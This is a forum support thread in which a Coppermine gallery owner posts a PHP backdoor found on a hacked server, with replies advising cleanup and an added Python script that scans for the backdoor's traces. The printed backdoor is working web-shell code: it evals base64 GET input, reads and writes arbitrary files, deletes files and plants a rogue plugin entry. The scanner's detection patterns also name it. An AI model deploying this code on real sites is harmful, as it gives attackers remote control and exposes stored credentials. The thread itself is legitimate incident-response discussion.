Hi guys!
I just realised something shocking:
I found in the copper/album directory a txt file which is an exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are 2 other unknown files in this directory. One of them is a PHP file which contains the code listed at the end of this topic.
Do you have any idea what this is?
Thank you in advance!
<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash="b269fcfd....23ec7fad79df17";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>';
$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
Your gallery was hacked. Delete the unknown files (have a look at the userpics folder too) and update to the latest cpg version (cpg1.4.20)
Quote from: François Keller on February 21, 2009, 06:05:48 PM
Delete the unknown files (have a look at the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what? (http://forum.coppermine-gallery.net/index.php/topic,51927.0.html)"
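Added example (not part of the thread and not Coppermine code): a triage sketch that looks for the traces the posted file leaves behind, namely PHP files under the upload directory, text copies of the config, and a plugin row whose path climbs out of the plugins folder. The function names, the sample tree and the plugin rows are constructed, and the code assumes legitimate plugin paths are plain folder names.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the backdoor posted in this thread.
CODE_PATTERNS = {
    "eval-of-request-input": re.compile(
        rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)"),
    "includes-gallery-config": re.compile(rb"include\s*\([^)]*config\.inc\.php"),
    "writes-plugins-table": re.compile(rb"INSERT\s+INTO[^;]*plugins", re.I),
}
CONFIG_COPY = re.compile(rb"\$CONFIG\s*\[\s*[\"']dbpass[\"']\s*\]")
PHP_EXT = {".php", ".php3", ".php4", ".php5", ".phtml"}

def scan_upload_tree(root):
    """Return sorted (relative_path, reason) findings under an upload directory."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() in PHP_EXT:
            # Every PHP file is reported; compare against a clean release copy.
            hits = [name for name, rx in CODE_PATTERNS.items() if rx.search(data)]
            findings.append((rel, "+".join(hits) or "php-in-upload-dir"))
        elif CONFIG_COPY.search(data):
            findings.append((rel, "config-copy"))
    return sorted(findings)

def suspicious_plugin_rows(rows):
    """Flag (name, path) rows whose path is absolute or contains '..' (assumption)."""
    return [name for name, path in rows
            if path.startswith("/") or ".." in path.split("/")]

def demo():
    """Run both checks on a constructed sample tree and constructed plugin rows."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "userpics").mkdir()
        (root / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed image bytes")
        (root / "notes.txt").write_text("$CONFIG['dbpass'] = 'constructed';\n")
        (root / "x.php").write_text('<? include("../include/config.inc.php");\n'
                                    'eval(base64_decode($_GET["eval"])); ?>')
        (root / "userpics" / "codebase.php").write_text('<?php die(""); ?>')
        files = scan_upload_tree(root)
    rows = [("Constructed good plugin", "sample_plugin"),
            ("Sumple Plugin", "/../../../var/www/albums/userpics")]
    return files, suspicious_plugin_rows(rows)

if __name__ == "__main__":
    print(demo())
```

A finding only says where to look; because the config was exposed, the database password still has to be changed as part of the cleanup.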